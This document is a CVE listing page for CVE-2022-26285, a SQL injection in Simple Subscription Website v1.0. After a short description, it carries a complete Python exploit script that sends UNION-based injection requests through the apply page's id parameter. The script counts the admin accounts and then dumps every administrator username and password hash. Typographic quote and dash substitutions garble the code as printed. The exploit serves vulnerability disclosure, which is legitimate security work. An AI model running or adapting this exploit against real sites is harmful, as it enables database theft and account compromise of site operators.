Headline

CVE-2022-26285: Multiple-SQLi-in-Simple-Subscription-Company/apply_sqli.py at main · Dir0x/Multiple-SQLi-in-Simple-Subscription-Company

Simple Subscription Website v1.0 was discovered to contain a SQL injection vulnerability via the id parameter in the apply endpoint. This vulnerability allows attackers to dump the application’s database via crafted HTTP requests.

2 years ago

CVE

Open in Source

#sql #vulnerability #web #debian #apache

Permalink

#!/usr/bin/python3

# Exploit Title: SQLi in apply endpoint of Simple Subscription Website

# Date: 05/11/2021

# Exploit Author: Daniel Haro

# Vendor Homepage: https://www.sourcecodester.com/php/15013/simple-subscription-website-admin-panel-php-and-sqlite-source-code.html

# Software Link: https://www.sourcecodester.com/php/15013/simple-subscription-website-admin-panel-php-and-sqlite-source-code.html

# Version: 1.0

# Tested on: debian 10, apache, mysql

from requests import get

from re import search

import argparse

args = argparse.ArgumentParser(description="Exploit to SQL injection in view_plan page of Simple Subscription CMS through id parameter")

args.add_argument('-t’, '–target’, help="URL of the victim. Example: http://localhost/plan_application")

args = args.parse_args()

print(“Simple Subscription Website”)

print(“Error based SQL injection exploit”)

count_req = get(args.target + "/?page=apply&id=%27%20union%20select%20null,%20count(*),null,null,null,null,null,null%20from%20admin_list–%20-")

n = search('<h2 class="text-center fs-4">.*’, count_req.text)

n = int(n.group(0).replace('<h2 class="text-center fs-4">’, ‘’).replace(“</h2>","”))

print(“±-----------------------------±-------------------------------+”)

print(“| username | hash |”)

print(“±-----------------------------±-------------------------------+”)

for i in range(1, n+1):

user = search('<h2 class="text-center fs-4">.*’, get(args.target + “/?page=apply&id=%27%20union%20select%20null,username,null,null,null,null,null,null%20from%20admin_list%20where%20admin_id=” + str(i) + "–%20-").text).group(0).replace('<h2 class="text-center fs-4">’, ‘’).replace(“</h2>","”).replace("\r", “”)

hash = search('<h2 class="text-center fs-4">.*’, get(args.target + “/?page=apply&id=%27%20union%20select%20null,password,null,null,null,null,null,null%20from%20admin_list%20where%20admin_id=” + str(i) + "–%20-").text).group(0).replace('<h2 class="text-center fs-4">’, ‘’).replace(“</h2>","”).replace("\r", “”)

user = “|” + user + (" "*(30-len(user))) + “|”

print(user + hash + “|”)

print(“±-----------------------------±-------------------------------+”)